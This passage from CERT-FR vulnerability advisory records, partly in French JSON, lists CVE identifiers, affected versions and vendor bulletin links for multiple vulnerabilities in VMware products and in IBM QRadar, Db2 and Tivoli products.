"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2022-41715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41715"
},
{
"name": "CVE-2022-41722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41722"
},
{
"name": "CVE-2025-61731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61731"
},
{
"name": "CVE-2026-27137",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27137"
},
{
"name": "CVE-2023-45285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45285"
},
{
"name": "CVE-2024-24783",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24783"
},
{
"name": "CVE-2023-45284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45284"
},
{
"name": "CVE-2023-29403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29403"
},
{
"name": "CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2025-9820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9820"
},
{
"name": "CVE-2023-29405",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29405"
},
{
"name": "CVE-2022-30629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30629"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2023-45289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45289"
},
{
"name": "CVE-2025-61985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61985"
},
{
"name": "CVE-2022-32148",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32148"
},
{
"name": "CVE-2026-24051",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24051"
},
{
"name": "CVE-2023-45290",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45290"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"name": "CVE-2022-30630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30630"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2026-27142",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27142"
},
{
"name": "CVE-2023-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2022-1705",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1705"
},
{
"name": "CVE-2025-58063",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58063"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2023-39318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39318"
},
{
"name": "CVE-2022-41720",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41720"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2022-41716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41716"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2022-30633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30633"
},
{
"name": "CVE-2025-61984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61984"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2022-30632",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30632"
},
{
"name": "CVE-2025-61732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61732"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2023-29406",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29406"
},
{
"name": "CVE-2023-39319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39319"
},
{
"name": "CVE-2026-27903",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27903"
},
{
"name": "CVE-2024-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24785"
},
{
"name": "CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"name": "CVE-2022-1962",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1962"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2022-41717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41717"
},
{
"name": "CVE-2026-1229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1229"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2026-25210",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25210"
},
{
"name": "CVE-2023-24536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24536"
},
{
"name": "CVE-2022-28131",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28131"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2026-24515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2022-2880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2880"
},
{
"name": "CVE-2023-24539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24539"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"name": "CVE-2022-2879",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2879"
},
{
"name": "CVE-2023-24532",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24532"
},
{
"name": "CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2023-29400",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29400"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2024-24787",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24787"
},
{
"name": "CVE-2022-41724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41724"
},
{
"name": "CVE-2022-30634",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30634"
},
{
"name": "CVE-2025-58181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
},
{
"name": "CVE-2025-47914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2023-24540",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24540"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-24537",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24537"
},
{
"name": "CVE-2026-27571",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27571"
},
{
"name": "CVE-2026-27139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27139"
},
{
"name": "CVE-2023-45287",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45287"
},
{
"name": "CVE-2022-30580",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30580"
},
{
"name": "CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"name": "CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"name": "CVE-2023-24531",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24531"
},
{
"name": "CVE-2023-24538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24538"
},
{
"name": "CVE-2025-11065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11065"
},
{
"name": "CVE-2022-29804",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29804"
},
{
"name": "CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"name": "CVE-2022-41723",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41723"
},
{
"name": "CVE-2023-39323",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39323"
},
{
"name": "CVE-2023-29402",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29402"
},
{
"name": "CVE-2023-39326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39326"
},
{
"name": "CVE-2023-29409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29409"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2023-24534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24534"
},
{
"name": "CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"name": "CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"name": "CVE-2025-68119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68119"
},
{
"name": "CVE-2025-22873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22873"
},
{
"name": "CVE-2024-24784",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24784"
},
{
"name": "CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"name": "CVE-2025-0167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
},
{
"name": "CVE-2025-64702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64702"
},
{
"name": "CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"name": "CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"name": "CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"name": "CVE-2025-68151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68151"
},
{
"name": "CVE-2026-3784",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
},
{
"name": "CVE-2026-25646",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25646"
}
],
"initial_release_date": "2026-03-23T00:00:00",
"last_revision_date": "2026-03-23T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0339",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-23T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37283",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37283"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37288",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37288"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37281",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37281"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37278",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37278"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37282",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37282"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37286",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37286"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37279",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37279"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37280",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37280"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37284",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37284"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37277",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37277"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37285",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37285"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37287",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37287"
}
]
}
CERTFR-2026-AVI-0249
Vulnerability from certfr_avis - Published: 2026-03-06 - Updated: 2026-03-06
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar | QRadar Data Synchronization App versions antérieures à 3.3.0 | ||
| IBM | Db2 | DB2 Data Management Console versions antérieures à 3.1.13 | ||
| IBM | Tivoli | Tivoli Netcool/OMNIbus_GUI sans le dernier correctif de sécurité | ||
| IBM | Db2 | DB2 Recovery Expert versions antérieures à 5.5.0.1 Interim Fix 8 | ||
| IBM | Db2 | Db2 Warehouse on Cloud Pak for Data versions antérieures à 5.3.1 | ||
| IBM | Db2 | Db2 on Cloud Pak for Data versions antérieures à 5.3.1 | ||
| IBM | QRadar | QRadar Pre-Validation App versions antérieures à 2.0.2 |
| Title | Publication Time | Tags | ||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Data Synchronization App versions ant\u00e9rieures \u00e0 3.3.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console versions ant\u00e9rieures \u00e0 3.1.13",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Tivoli Netcool/OMNIbus_GUI sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Tivoli",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Recovery Expert versions ant\u00e9rieures \u00e0 5.5.0.1 Interim Fix 8",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse on Cloud Pak for Data versions ant\u00e9rieures \u00e0 5.3.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 on Cloud Pak for Data versions ant\u00e9rieures \u00e0 5.3.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Pre-Validation App versions ant\u00e9rieures \u00e0 2.0.2",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
},
{
"name": "CVE-2025-66506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66506"
},
{
"name": "CVE-2021-33036",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33036"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2025-36353",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36353"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2023-21843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21843"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2018-14042",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14042"
},
{
"name": "CVE-2025-58190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58190"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2023-38264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38264"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2016-0703",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0703"
},
{
"name": "CVE-2025-5222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5222"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2025-13867",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13867"
},
{
"name": "CVE-2025-2668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2668"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2025-36427",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36427"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2023-21954",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21954"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-3154",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3154"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2025-36384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36384"
},
{
"name": "CVE-2025-36098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36098"
},
{
"name": "CVE-2025-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21830"
},
{
"name": "CVE-2024-50302",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50302"
},
{
"name": "CVE-2025-36184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36184"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2016-0800",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0800"
},
{
"name": "CVE-2024-3933",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3933"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-49128",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49128"
},
{
"name": "CVE-2025-22091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22091"
},
{
"name": "CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2025-36247",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36247"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2025-36009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36009"
},
{
"name": "CVE-2016-9318",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9318"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2026-23745",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23745"
},
{
"name": "CVE-2025-15467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15467"
},
{
"name": "CVE-2022-21624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21624"
},
{
"name": "CVE-2025-36070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36070"
},
{
"name": "CVE-2022-46337",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46337"
},
{
"name": "CVE-2015-2716",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2716"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-36428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36428"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2025-15284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
},
{
"name": "CVE-2024-34447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34447"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2024-29025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29025"
},
{
"name": "CVE-2025-36424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36424"
},
{
"name": "CVE-2025-36387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36387"
},
{
"name": "CVE-2019-19921",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19921"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2025-64329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64329"
},
{
"name": "CVE-2025-27903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27903"
},
{
"name": "CVE-2015-1283",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-1283"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2025-37958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37958"
},
{
"name": "CVE-2023-22041",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22041"
},
{
"name": "CVE-2022-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21626"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2016-4472",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4472"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2024-9042",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9042"
},
{
"name": "CVE-2025-22233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22233"
},
{
"name": "CVE-2024-31141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31141"
},
{
"name": "CVE-2025-30691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30691"
},
{
"name": "CVE-2025-57822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57822"
},
{
"name": "CVE-2024-53113",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53113"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2025-67779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67779"
},
{
"name": "CVE-2022-32743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32743"
},
{
"name": "CVE-2025-55183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55183"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2024-38820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38820"
},
{
